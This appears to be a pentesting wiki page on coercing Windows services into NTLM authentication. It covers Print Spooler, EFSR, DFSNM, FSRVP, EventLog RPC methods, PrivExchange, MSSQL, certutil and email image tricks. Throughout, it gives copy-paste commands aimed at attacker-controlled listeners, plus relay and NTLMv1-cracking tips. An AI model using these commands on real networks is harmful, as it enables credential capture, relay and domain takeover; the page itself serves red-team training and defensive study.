Force NTLM Privileged Authentication

SharpSystemTriggers

SharpSystemTriggers is a collection of remote authentication triggers coded in C# using MIDL compiler for avoiding 3rd party dependencies.

Spooler Service Abuse

If the Print Spooler service is enabled, you can use some already known AD credentials to request to the Domain Controller’s print server an update on new print jobs and just tell it to send the notification to some system.\
Note when printer send the notification to an arbitrary systems, it needs to authenticate against that system. Therefore, an attacker can make the Print Spooler service authenticate against an arbitrary system, and the service will use the computer account in this authentication.

Under the hood, the classic PrinterBug primitive abuses RpcRemoteFindFirstPrinterChangeNotificationEx over \\PIPE\\spoolss. The attacker first opens a printer/server handle and then supplies a fake client name in pszLocalMachine, so the target spooler creates a notification channel back to the attacker-controlled host. This is why the effect is outbound authentication coercion rather than direct code execution.\
If you are looking for RCE/LPE in the spooler itself, check PrintNightmare. This page is focused on coercion and relay.

Finding Windows Servers on the domain

Using PowerShell, get a list of Windows boxes. Servers are usually priority, so lets focus there:

Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt

Finding Spooler services listening

Using a slightly modified @mysmartlogin's (Vincent Le Toux's) SpoolerScanner, see if the Spooler Service is listening:

. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}

You can also use rpcdump.py on Linux and look for the MS-RPRN protocol:

rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN

Or quickly test hosts from Linux with NetExec/CrackMapExec:

nxc smb targets.txt -u user -p password -M spooler

If you want to enumerate coercion surfaces instead of just checking whether the spooler endpoint exists, use Coercer scan mode:

coercer scan -u user -p password -d domain -t TARGET --filter-protocol-name MS-RPRN
coercer scan -u user -p password -d domain -t TARGET --filter-pipe-name spoolss

This is useful because seeing the endpoint in EPM only tells you that the print RPC interface is registered. It does not guarantee that every coercion method is reachable with your current privileges or that the host will emit a usable authentication flow.

Ask the service to authenticate against an arbitrary host

You can compile SpoolSample from here.

SpoolSample.exe <TARGET> <RESPONDERIP>

or use 3xocyte's dementor.py or printerbug.py if you're on Linux

python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>

With Coercer, you can target the spooler interfaces directly and avoid guessing which RPC method is exposed:

coercer coerce -u user -p password -d domain -t TARGET -l LISTENER --filter-protocol-name MS-RPRN
coercer coerce -u user -p password -d domain -t TARGET -l LISTENER --filter-method-name RpcRemoteFindFirstPrinterChangeNotificationEx

Forcing HTTP instead of SMB with WebClient

Classic PrinterBug usually yields an SMB authentication to \\attacker\share, which is still useful for capture, relay to HTTP targets or relay where SMB signing is absent.\
However, in modern environments, relaying SMB to SMB is frequently blocked by SMB signing, so operators often prefer to force HTTP/WebDAV authentication instead.

If the target has the WebClient service running, the listener can be specified in a form that makes Windows use WebDAV over HTTP:

printerbug.py 'domain/username:password'@TARGET 'ATTACKER@80/share'
coercer coerce -u user -p password -d domain -t TARGET -l ATTACKER --http-port 80 --filter-protocol-name MS-RPRN

This is especially useful when chaining with ntlmrelayx --adcs or other HTTP relay targets because it avoids relying on SMB relayability on the coerced connection. The important caveat is that WebClient must be running on the victim for the HTTP/WebDAV variant to work.

Combining with Unconstrained Delegation

If an attacker has already compromised a computer with Unconstrained Delegation, the attacker could make the printer authenticate against this computer. Due to the unconstrained delegation, the TGT of the computer account of the printer will be saved in the memory of the computer with unconstrained delegation. As the attacker has already compromised this host, he will be able to retrieve this ticket and abuse it (Pass the Ticket).

RPC Force authentication

Coercer

RPC UNC-path coercion matrix (interfaces/opnums that trigger outbound auth)

MS-RPRN (Print System Remote Protocol)
Pipe: \PIPE\spoolss
IF UUID: 12345678-1234-abcd-ef00-0123456789ab
Opnums: 62 RpcRemoteFindFirstPrinterChangeNotification; 65 RpcRemoteFindFirstPrinterChangeNotificationEx
Tools: PrinterBug / SpoolSample / Coercer
MS-PAR (Print System Asynchronous Remote)
Pipe: \PIPE\spoolss
IF UUID: 76f03f96-cdfd-44fc-a22c-64950a001209
Notes: asynchronous print interface on the same spooler pipe; use Coercer to enumerate reachable methods on a given host
MS-EFSR (Encrypting File System Remote Protocol)
Pipes: \PIPE\efsrpc (also via \PIPE\lsarpc, \PIPE\samr, \PIPE\lsass, \PIPE\netlogon)
IF UUIDs: c681d488-d850-11d0-8c52-00c04fd90f7e ; df1941c5-fe89-4e79-bf10-463657acf44d
Opnums commonly abused: 0, 4, 5, 6, 7, 12, 13, 15, 16
Tool: PetitPotam
MS-DFSNM (DFS Namespace Management)
Pipe: \PIPE\netdfs
IF UUID: 4fc742e0-4a10-11cf-8273-00aa004ae673
Opnums: 12 NetrDfsAddStdRoot; 13 NetrDfsRemoveStdRoot
Tool: DFSCoerce
MS-FSRVP (File Server Remote VSS)
Pipe: \PIPE\FssagentRpc
IF UUID: a8e0653c-2744-4389-a61d-7373df8b2292
Opnums: 8 IsPathSupported; 9 IsPathShadowCopied
Tool: ShadowCoerce
MS-EVEN (EventLog Remoting)
Pipe: \PIPE\even
IF UUID: 82273fdc-e32a-18c3-3f78-827929dc23ea
Opnum: 9 ElfrOpenBELW
Tool: CheeseOunce

Note: These methods accept parameters that can carry a UNC path (e.g., \\attacker\share). When processed, Windows will authenticate (machine/user context) to that UNC, enabling NetNTLM capture or relay.\
For spooler abuse, MS-RPRN opnum 65 remains the most common and best-documented primitive because the protocol specification explicitly states that the server creates a notification channel back to the client specified by pszLocalMachine.

MS-EVEN: ElfrOpenBELW (opnum 9) coercion

Interface: MS-EVEN over \PIPE\even (IF UUID 82273fdc-e32a-18c3-3f78-827929dc23ea)
Call signature: ElfrOpenBELW(UNCServerName, BackupFileName="\\attacker\share\backup.evt", MajorVersion=1, MinorVersion=1, LogHandle)
Effect: the target attempts to open the supplied backup log path and authenticates to the attacker-controlled UNC.
Practical use: coerce Tier 0 assets (DC/RODC/Citrix/etc.) to emit NetNTLM, then relay to AD CS endpoints (ESC8/ESC11 scenarios) or other privileged services.

PrivExchange

The PrivExchange attack is a result of a flaw found in the Exchange Server PushSubscription feature. This feature allows the Exchange server to be forced by any domain user with a mailbox to authenticate to any client-provided host over HTTP.

By default, the Exchange service runs as SYSTEM and is given excessive privileges (specifically, it has WriteDacl privileges on the domain pre-2019 Cumulative Update). This flaw can be exploited to enable the relaying of information to LDAP and subsequently extract the domain NTDS database. In cases where relaying to LDAP is not possible, this flaw can still be used to relay and authenticate to other hosts within the domain. The successful exploitation of this attack grants immediate access to the Domain Admin with any authenticated domain user account.

Inside Windows

If you are already inside the Windows machine you can force Windows to connect to a server using privileged accounts with:

Defender MpCmdRun

C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt

MSSQL

EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1

MSSQLPwner

# Issuing NTLM relay attack on the SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on the local server with custom command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250

Or use this other technique: https://github.com/p0dalirius/MSSQL-Analysis-Coerce

Certutil

It's possible to use certutil.exe lolbin (Microsoft-signed binary) to coerce NTLM authentication:

certutil.exe -syncwithWU  \\127.0.0.1\share

HTML injection

Via email

If you know the email address of the user that logs inside a machine you want to compromise, you could just send him an email with a 1x1 image such as

<img src="\\10.10.17.231\test.ico" height="1" width="1" />

and when he opens it, he will try to authenticate.

MitM

If you can perform a MitM attack to a computer and inject HTML in a page he will visualize you could try injecting an image like the following in the page:

<img src="\\10.10.17.231\test.ico" height="1" width="1" />

Other ways to force and phish NTLM authentication

{{#ref}}
../ntlm/places-to-steal-ntlm-creds.md
{{#endref}}

Cracking NTLMv1

If you can capture NTLMv1 challenges read here how to crack them.\
Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"